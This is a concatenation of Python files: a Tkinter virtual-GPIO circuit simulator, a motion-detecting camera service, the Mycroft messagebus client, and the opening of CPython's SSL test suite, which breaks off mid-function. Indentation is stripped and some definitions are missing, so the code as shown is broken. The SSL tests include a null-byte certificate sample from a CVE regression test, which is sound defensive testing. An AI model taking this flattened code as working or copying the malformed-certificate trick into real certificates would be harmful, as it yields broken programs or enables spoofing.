from PIL import ImageEnhance, Image, ImageDraw, ImageFont, ImageTk
# from sounddevice import play, stop
import numpy
import scipy.signal
from tkinter import Tk, Frame, Label, Button, Scale, HORIZONTAL, VERTICAL, CENTER
from threading import Thread, Timer
from sys import path, exit
from pathlib import Path
from functools import partial
from math import sqrt
import os
class TkCircuit(metaclass=SingletonMeta):
def __init__(self, setup):
Device.pin_factory = PreciseMockFactory(pin_class=MockPWMPin)
path.insert(0, str(Path(__file__).parent.absolute()))
default_setup = {
"name": "Virtual GPIO",
"width": 500, "height": 500,
"leds":[], "buzzers":[], "buttons":[],
"lcds":[],
"motion_sensors": [],
"distance_sensors": [],
"light_sensors": [],
"infrared_receiver": None,
"infrared_emitter": None
}
default_setup.update(setup)
setup = default_setup
self._root = Tk()
self._root.title(setup["name"])
self._root.geometry("%dx%d" % (setup["width"], setup["height"]))
self._root.resizable(False, False)
self._root["background"] = "white"
self._root.protocol("WM_DELETE_WINDOW", self._on_closing)
self._root.tk.call("tk", "scaling", 1.0)
self._outputs = []
self._outputs += [self.add_device(TkLED, parameters) for parameters in setup["leds"]]
self._outputs += [self.add_device(TkBuzzer, parameters) for parameters in setup["buzzers"]]
self._lcds = [self.add_device(TkLCD, parameters) for parameters in setup["lcds"]]
for parameters in setup["buttons"]:
self.add_device(TkButton, parameters)
for parameters in setup["distance_sensors"]:
self.add_device(TkDistanceSensor, parameters)
for parameters in setup["light_sensors"]:
self.add_device(TkLightSensor, parameters)
for parameters in setup["motion_sensors"]:
self.add_device(TkMotionSensor, parameters)
if setup["infrared_receiver"] != None:
self.add_device(TkInfraredReceiver, setup["infrared_receiver"])
if setup["infrared_emitter"] != None:
self.add_device(TkInfraredEmitter, setup["infrared_emitter"])
def add_device(self, device_class, parameters):
return device_class(self._root, **parameters)
def run(self, function):
thread = Thread(target=function, daemon=True)
thread.start()
self._root.after(10, self._update_outputs)
self._root.mainloop()
def _update_outputs(self):
for output in self._outputs:
output.update()
self._root.after(10, self._update_outputs)
def update_lcds(self, pins, text):
for lcds in self._lcds:
lcds.update_text(pins, text)
def _on_closing(self):
exit()
class TkLCD(TkDevice):
_image = None
_photo_image = None
def __init__(self, root, x, y, name, pins, columns, lines):
super().__init__(root, x, y, name)
self._redraw()
self._pins = pins
self._columns = columns
self._lines = lines
self._label = Label(root)
self._label.place(x=x, y=y)
self.update_text(self._pins, "")
def update_text(self, pins, text):
MARGIN = 8
FONT_SIZE = 17
CHAR_WIDTH = 12
CHAR_HEIGHT = 16
CHAR_X_GAP = 3
CHAR_Y_GAP = 5
image_width = MARGIN * 2 + self._columns * (CHAR_WIDTH) + (self._columns - 1) * CHAR_X_GAP
image_height = MARGIN * 2 + self._lines * (CHAR_HEIGHT) + (self._lines - 1) * CHAR_Y_GAP
if pins == self._pins:
image = Image.new('RGB', (image_width, image_height), color="#82E007")
current_folder = os.path.dirname(__file__)
font_path = os.path.join(current_folder, "resources/fonts/hd44780.ttf")
font = ImageFont.truetype(font_path, FONT_SIZE)
d = ImageDraw.Draw(image)
x = MARGIN
for j in range(0, self._columns):
y = MARGIN
for i in range(0, self._lines):
d.rectangle((x, y, x+CHAR_WIDTH, y+CHAR_HEIGHT), fill ="#72D000")
y += (CHAR_Y_GAP + CHAR_HEIGHT)
x += (CHAR_X_GAP + CHAR_WIDTH)
x = MARGIN
y = MARGIN
line = 1
column = 1
for character in text:
if character == "\n":
y += (CHAR_Y_GAP + CHAR_HEIGHT)
x = MARGIN
line += 1
column = 1
else:
if line <= self._lines and column <= self._columns:
d.text((x,y), character, font=font, fill="black")
x += (CHAR_X_GAP + CHAR_WIDTH)
column += 1
self._photo_image = ImageTk.PhotoImage(image)
self._label.configure(image = self._photo_image)
self._redraw()
self._root.update()
class TkBuzzer(TkDevice):
SAMPLE_RATE = 44000
PEAK = 0.1
DUTY_CICLE = 0.5
def __init__(self, root, x, y, name, pin, frequency=440):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._previous_state = None
self._set_image_for_state("buzzer_on.png", "on", (50, 33))
self._set_image_for_state("buzzer_off.png", "off", (50, 33))
self._create_main_widget(Label, "off")
if frequency != None:
n_samples = self.SAMPLE_RATE
t = numpy.linspace(0, 1, int(500 * 440/frequency), endpoint=False)
wave = scipy.signal.square(2 * numpy.pi * 5 * t, duty=self.DUTY_CICLE)
wave = numpy.resize(wave, (n_samples,))
self._sample_wave = (self.PEAK / 2 * wave.astype(numpy.int16))
else:
self._sample_wave = numpy.empty(0)
def update(self):
if self._previous_state != self._pin.state:
if self._pin.state == True:
self._change_widget_image("on")
# if len(self._sample_wave) > 0:
# play(self._sample_wave, self.SAMPLE_RATE, loop=True)
else:
self._change_widget_image("off")
# if len(self._sample_wave) > 0:
# stop()
self._previous_state = self._pin.state
self._redraw()
class TkLED(TkDevice):
on_image = None
def __init__(self, root, x, y, name, pin):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._previous_state = None
TkLED.on_image = self._set_image_for_state("led_on.png", "on", (30, 30))
self._set_image_for_state("led_off.png", "off", (30, 30))
self._create_main_widget(Label, "off")
def update(self):
if self._previous_state != self._pin.state:
if isinstance(self._pin.state, float):
converter = ImageEnhance.Color(TkLED.on_image)
desaturated_image = converter.enhance(self._pin.state)
self._change_widget_image(desaturated_image)
elif self._pin.state == True:
self._change_widget_image("on")
else:
self._change_widget_image("off")
self._previous_state = self._pin.state
self._redraw()
class TkButton(TkDevice):
def __init__(self, root, x, y, name, pin):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._set_image_for_state("button_pressed.png", "on", (30, 30))
self._set_image_for_state("button_released.png", "off", (30, 30))
self._create_main_widget(Button, "off")
self._widget.config(borderwidth=0,highlightthickness = 0,background="white")
self._widget.bind("<ButtonPress>", self._on_press)
self._widget.bind("<ButtonRelease>", self._on_release)
def _on_press(self, botao):
self._change_widget_image("on")
thread = Thread(target=self._change_pin, daemon=True, args=(True,))
thread.start()
def _on_release(self, botao):
self._change_widget_image("off")
thread = Thread(target=self._change_pin, daemon=True, args=(False,))
thread.start()
def _change_pin(self, is_press):
if is_press:
self._pin.drive_low()
else:
self._pin.drive_high()
class TkMotionSensor(TkDevice):
def __init__(self, root, x, y, name, pin, detection_radius=50, delay_duration=5, block_duration=3):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._detection_radius = detection_radius
self._delay_duration = delay_duration
self._block_duration = block_duration
self._motion_timer = None
self._block_timer = None
self._set_image_for_state("motion_sensor_on.png", "motion", (80, 60))
self._set_image_for_state("motion_sensor_off.png", "no motion", (80, 60))
self._set_image_for_state("motion_sensor_wait.png", "wait", (80, 60))
self._create_main_widget(Label, "no motion")
root.bind('<Motion>', self._motion_detected)
def _motion_detected(self, event):
x_pointer = self._root.winfo_pointerx() - self._root.winfo_rootx()
y_pointer = self._root.winfo_pointery() - self._root.winfo_rooty()
x_center = self._widget.winfo_x() + self._widget.winfo_width() / 2
y_center = self._widget.winfo_y() + self._widget.winfo_height() / 2
distance = sqrt(pow(x_pointer - x_center, 2) + pow(y_pointer - y_center, 2))
if distance < self._detection_radius and self._block_timer == None:
if self._motion_timer == None:
self._change_widget_image("motion")
else:
self._motion_timer.cancel()
self._pin.drive_high()
self._motion_timer = Timer(self._delay_duration, self._remove_detection)
self._motion_timer.start()
def _remove_detection(self):
self._pin.drive_low()
self._change_widget_image("wait")
self._motion_timer = None
self._block_timer = Timer(self._block_duration, self._remove_block)
self._block_timer.start()
def _remove_block(self):
self._change_widget_image("no motion")
self._block_timer = None
class TkDistanceSensor(TkDevice):
def __init__(self, root, x, y, name, trigger_pin, echo_pin, min_distance=0, max_distance=50):
super().__init__(root, x, y, name)
self._echo_pin = Device.pin_factory.pin(echo_pin)
self._trigger_pin = Device.pin_factory.pin(trigger_pin,
pin_class=PreciseMockTriggerPin, echo_pin=self._echo_pin, echo_time=0.004)
self._echo_pin._bounce = 0
self._trigger_pin._bounce = 0
self._set_image_for_state("distance_sensor.png", "normal", (86, 50))
self._create_main_widget(Label, "normal")
self._scale = Scale(root, from_=min_distance, to=max_distance,
orient=HORIZONTAL, command=self._scale_changed, sliderlength=20, length=150, highlightthickness = 0, background="white")
self._scale.place(x=x+100, y=y)
self._scale.set(round((min_distance + max_distance) / 2))
self._scale_changed(self._scale.get())
def _scale_changed(self, value):
speed_of_sound = 343.26 # m/s
distance = float(value) / 100 # cm -> m
self._trigger_pin.echo_time = distance * 2 / speed_of_sound
class TkLightSensor(TkDevice):
def __init__(self, root, x, y, name, pin):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin, pin_class=PreciseMockChargingPin)
self._scale = Scale(root, from_=0, to=90, showvalue=0,
orient=VERTICAL, command=self._scale_changed, sliderlength=20, length=150, highlightthickness = 0, background="white")
self._scale.place(x=x+90, y=y)
self._scale.set(30)
self._scale_changed(self._scale.get())
self._set_image_for_state("light_sensor.png", "normal", (75, 150))
self._create_main_widget(Label, "normal")
def _scale_changed(self, value):
self._pin.charge_time = float(value) / 10000
class TkInfraredReceiver(TkDevice, metaclass=SingletonMeta):
def __init__(self, root, x, y, name, config, remote_control):
super().__init__(root, x, y, name)
remote = remote_control
frame = Frame(root, bg = remote["color"], width = remote["width"], height = remote["height"])
frame.place(x=x, y=y)
self._config = config
self._key_codes = []
self._pressed_key_codes = []
for i in range(0, len(remote["key_rows"])):
row = remote["key_rows"][i]
for j in range(0, len(row["buttons"])):
button_setup = row["buttons"][j]
if button_setup != None:
code = button_setup.get("code", "KEY_" + button_setup["name"])
self._key_codes.append(code)
command = partial(self._key_press, code)
button = Button(frame, text=button_setup["name"],
width=remote["key_width"], height=remote["key_height"],
command=command,
justify=CENTER, highlightbackground=remote["color"])
button.grid(row=i, column=j, padx=8, pady=8)
frame.configure(width = remote["width"], height = remote["height"])
def config_name(self):
return self._config
def clear_codes(self):
self._pressed_key_codes = []
def get_next_code(self):
if len(self._pressed_key_codes) == 0:
return []
else:
return [self._pressed_key_codes.pop(0)]
def _key_press(self, code):
self._pressed_key_codes.append(code)
class TkInfraredEmitter(TkDevice, metaclass=SingletonMeta):
def __init__(self, root, x, y, name, remote_controls):
super().__init__(root, x, y, name)
self._set_image_for_state("emitter_on.png", "on", (50, 30))
self._set_image_for_state("emitter_off.png", "off", (50, 30))
self._create_main_widget(Label, "off")
self._remote_controls = remote_controls
self._timer = None
def list_remotes(self, remote):
return self._remote_controls.keys()
def list_codes(self, remote):
valid_codes = self._remote_controls.get(remote, None)
if valid_codes == None:
print("\x1b[1;37;41m" + remote + ": INVALID REMOTE CONTROL!" + "\x1b[0m")
return valid_codes
def send_once(self, remote, codes, count):
valid_codes = self.list_codes(remote)
if valid_codes == None:
return
has_valid_code = False
for code in codes:
if code in valid_codes:
print("\x1b[1;37;42m" + code + " of remote \"" + remote + "\" transmitted!" + "\x1b[0m")
has_valid_code = True
else:
print("\x1b[1;37;41m" + code + ": INVALID CODE FOR REMOTE \"" + remote + "\"!" + "\x1b[0m")
if has_valid_code:
if self._timer != None:
self._timer.cancel()
self._change_widget_image("on")
self._timer = Timer(1, self._turn_off_emitter).start()
def _turn_off_emitter(self):
self._change_widget_image("off")
self._timer = None
|
GuardpianService.py
|
import logging
import sys
from time import sleep
from threading import Thread
log = logging.getLogger(__name__)
class GuardpianService:
def __init__(self, base_path, camera, gpio, email_sender, ifttt_enabled, ifttt_client):
self.base_path = base_path
self.camera = camera
self.gpio = gpio
self.email_sender = email_sender
self.ifttt_enabled = ifttt_enabled
self.ifttt_client = ifttt_client
self.is_ifttt_on = False # To avoid unnecessary IFTTT calls
def start(self):
try:
self.__capture_on_start()
# Add listeners for GPIO events
self.gpio.add_event_detect(self.__event_detect_callback)
# Loop forever
while True:
sleep(100)
except KeyboardInterrupt:
log.info("Quit")
pass
except Exception as e:
log.error("Not controlled error happened: " + str(e))
self.__send(image_full_path=None,
content="Some uncontrolled Error happened... Shutting down. Error: " + str(e))
pass
finally:
log.info("Cleaning GPIO and shutting down...")
self.gpio.cleanup()
self.camera.close()
sys.exit("Shutdown.")
def __capture_on_start(self):
log.info('Capturing on start!')
if self.ifttt_enabled:
self.__send_ifttt_event_on()
self.__capture_and_send('start.jpg', 'The Guardpian was started.')
if self.ifttt_enabled:
self.__send_ifttt_event_off()
def __capture_and_send(self, image_name, content):
try:
image_full_path = self.base_path + image_name
self.camera.capture(image_full_path)
self.__send(image_full_path, content)
except Exception as e:
log.error("Cannot capture... " + str(e))
def __send(self, image_full_path, content):
try:
self.email_sender.send(content, image_full_path)
except Exception as e:
log.error("Cannot send email... " + str(e))
def __event_detect_callback(self, pin):
if self.gpio.input():
log.info("Motion detected!")
if self.ifttt_enabled:
self.__send_ifttt_event_on()
self.__capture_and_send('motion.jpg', 'The Guardpian detected some motion!')
else:
log.info("Motion off.")
if self.ifttt_enabled:
self.__send_ifttt_event_off()
def __send_ifttt_event_on(self):
try:
thread = Thread(target=self.ifttt_client.send_event_on)
thread.start()
self.is_ifttt_on = True
sleep(1.5)
except Exception as e:
log.error("Cannot send IFTTT event ON ... " + str(e))
def __send_ifttt_event_off(self):
try:
if self.is_ifttt_on:
sleep(5)
thread = Thread(target=self.ifttt_client.send_event_off)
thread.start()
self.is_ifttt_on = False
except Exception as e:
log.error("Cannot send IFTTT event Off ... " + str(e))
|
client.py
|
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The messagebus client is an exteneded websocket connection using a
standard format for the message and handles serialization / deserialization
automatically.
"""
from collections import namedtuple
import json
import logging
import time
import traceback
from threading import Event, Thread
from pyee import ExecutorEventEmitter
from websocket import (WebSocketApp,
WebSocketConnectionClosedException,
WebSocketException)
from mycroft_bus_client.message import Message
from mycroft_bus_client.util import create_echo_function
LOG = logging.getLogger(__name__)
class MessageWaiter:
"""Wait for a single message.
Encapsulate the wait for a message logic separating the setup from
the actual waiting act so the waiting can be setuo, actions can be
performed and _then_ the message can be waited for.
Argunments:
bus: Bus to check for messages on
message_type: message type to wait for
"""
def __init__(self, bus, message_type):
self.bus = bus
self.msg_type = message_type
self.received_msg = None
# Setup response handler
self.response_event = Event()
self.bus.once(message_type, self._handler)
def _handler(self, message):
"""Receive response data."""
self.received_msg = message
self.response_event.set()
def wait(self, timeout=3.0):
"""Wait for message.
Arguments:
timeout (int or float): seconds to wait for message
Returns:
Message or None
"""
self.response_event.wait(timeout)
if not self.response_event.is_set():
# Clean up the event handler
try:
self.bus.remove(self.msg_type, self._handler)
except (ValueError, KeyError):
# ValueError occurs on pyee 5.0.1 removing handlers
# registered with once.
# KeyError may theoretically occur if the event occurs as
# the handler is removed
pass
return self.received_msg
MessageBusClientConf = namedtuple('MessageBusClientConf',
['host', 'port', 'route', 'ssl'])
class MessageBusClient:
"""The Mycroft Messagebus Client
The Messagebus client connects to the Mycroft messagebus service
and allows communication with the system. It has been extended to work
like the pyee EventEmitter and tries to offer as much convenience as
possible to the developer.
"""
def __init__(self, host='0.0.0.0', port=8181, route='/core', ssl=False,
emitter=None):
self.config = MessageBusClientConf(host, port, route, ssl)
self.emitter = emitter or ExecutorEventEmitter()
self.client = self.create_client()
self.retry = 5
self.connected_event = Event()
self.started_running = False
@staticmethod
def build_url(host, port, route, ssl):
"""Build a websocket url."""
return '{scheme}://{host}:{port}{route}'.format(
scheme='wss' if ssl else 'ws',
host=host,
port=str(port),
route=route)
def create_client(self):
"""Setup websocket client."""
url = MessageBusClient.build_url(ssl=self.config.ssl,
host=self.config.host,
port=self.config.port,
route=self.config.route)
return WebSocketApp(url, on_open=self.on_open, on_close=self.on_close,
on_error=self.on_error, on_message=self.on_message)
def on_open(self, *args):
"""Handle the "open" event from the websocket.
A Basic message with the name "open" is forwarded to the emitter.
"""
LOG.info("Connected")
self.connected_event.set()
self.emitter.emit("open")
# Restore reconnect timer to 5 seconds on sucessful connect
self.retry = 5
def on_close(self, *args):
"""Handle the "close" event from the websocket.
A Basic message with the name "close" is forwarded to the emitter.
"""
self.emitter.emit("close")
def on_error(self, *args):
"""On error start trying to reconnect to the websocket."""
if len(args) == 1:
error = args[0]
else:
error = args[1]
if isinstance(error, WebSocketConnectionClosedException):
LOG.warning('Could not send message because connection has closed')
else:
LOG.exception('=== %s ===', repr(error))
try:
self.emitter.emit('error', error)
if self.client.keep_running:
self.client.close()
except Exception as e:
LOG.error('Exception closing websocket: %s', repr(e))
LOG.warning("Message Bus Client "
"will reconnect in %.1f seconds.", self.retry)
time.sleep(self.retry)
self.retry = min(self.retry * 2, 60)
try:
self.emitter.emit('reconnecting')
self.client = self.create_client()
self.run_forever()
except WebSocketException:
pass
def on_message(self, *args):
"""Handle incoming websocket message.
Args:
message (str): serialized Mycroft Message
"""
if len(args) == 1:
message = args[0]
else:
message = args[1]
parsed_message = Message.deserialize(message)
self.emitter.emit('message', message)
self.emitter.emit(parsed_message.msg_type, parsed_message)
def emit(self, message):
"""Send a message onto the message bus.
This will both send the message to the local process using the
event emitter and onto the Mycroft websocket for other processes.
Args:
message (Message): Message to send
"""
if not self.connected_event.wait(10):
if not self.started_running:
raise ValueError('You must execute run_forever() '
'before emitting messages')
self.connected_event.wait()
try:
if hasattr(message, 'serialize'):
self.client.send(message.serialize())
else:
self.client.send(json.dumps(message.__dict__))
except WebSocketConnectionClosedException:
LOG.warning('Could not send %s message because connection '
'has been closed', message.msg_type)
def wait_for_message(self, message_type, timeout=3.0):
"""Wait for a message of a specific type.
Arguments:
message_type (str): the message type of the expected message
timeout: seconds to wait before timeout, defaults to 3
Returns:
The received message or None if the response timed out
"""
return MessageWaiter(self, message_type).wait(timeout)
def wait_for_response(self, message, reply_type=None, timeout=3.0):
"""Send a message and wait for a response.
Arguments:
message (Message): message to send
reply_type (str): the message type of the expected reply.
Defaults to "<message.msg_type>.response".
timeout: seconds to wait before timeout, defaults to 3
Returns:
The received message or None if the response timed out
"""
message_type = reply_type or message.msg_type + '.response'
waiter = MessageWaiter(self, message_type) # Setup response handler
# Send message and wait for it's response
self.emit(message)
return waiter.wait(timeout)
def on(self, event_name, func):
"""Register callback with event emitter.
Args:
event_name (str): message type to map to the callback
func (callable): callback function
"""
self.emitter.on(event_name, func)
def once(self, event_name, func):
"""Register callback with event emitter for a single call.
Args:
event_name (str): message type to map to the callback
func (callable): callback function
"""
self.emitter.once(event_name, func)
def remove(self, event_name, func):
"""Remove registered event.
Args:
event_name (str): message type to map to the callback
func (callable): callback function
"""
try:
if event_name not in self.emitter._events:
LOG.debug("Not able to find '%s'", event_name)
self.emitter.remove_listener(event_name, func)
except ValueError:
LOG.warning('Failed to remove event %s: %s',
event_name, str(func))
for line in traceback.format_stack():
LOG.warning(line.strip())
if event_name not in self.emitter._events:
LOG.debug("Not able to find '%s'", event_name)
LOG.warning("Existing events: %s", repr(self.emitter._events))
for evt in self.emitter._events:
LOG.warning(" %s", repr(evt))
LOG.warning(" %s", repr(self.emitter._events[evt]))
if event_name in self.emitter._events:
LOG.debug("Removing found '%s'", event_name)
else:
LOG.debug("Not able to find '%s'", event_name)
LOG.warning('----- End dump -----')
def remove_all_listeners(self, event_name):
"""Remove all listeners connected to event_name.
Arguments:
event_name: event from which to remove listeners
"""
if event_name is None:
raise ValueError
self.emitter.remove_all_listeners(event_name)
def run_forever(self):
"""Start the websocket handling."""
self.started_running = True
self.client.run_forever()
def close(self):
"""Close the websocket connection."""
self.client.close()
self.connected_event.clear()
def run_in_thread(self):
"""Launches the run_forever in a separate daemon thread."""
t = Thread(target=self.run_forever)
t.daemon = True
t.start()
return t
def echo():
"""Echo function repeating all input from a user."""
message_bus_client = MessageBusClient()
def repeat_utterance(message):
message.msg_type = 'speak'
message_bus_client.emit(message)
message_bus_client.on('message', create_echo_function(None))
message_bus_client.on('recognizer_loop:utterance', repeat_utterance)
message_bus_client.run_forever()
if __name__ == "__main__":
echo()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
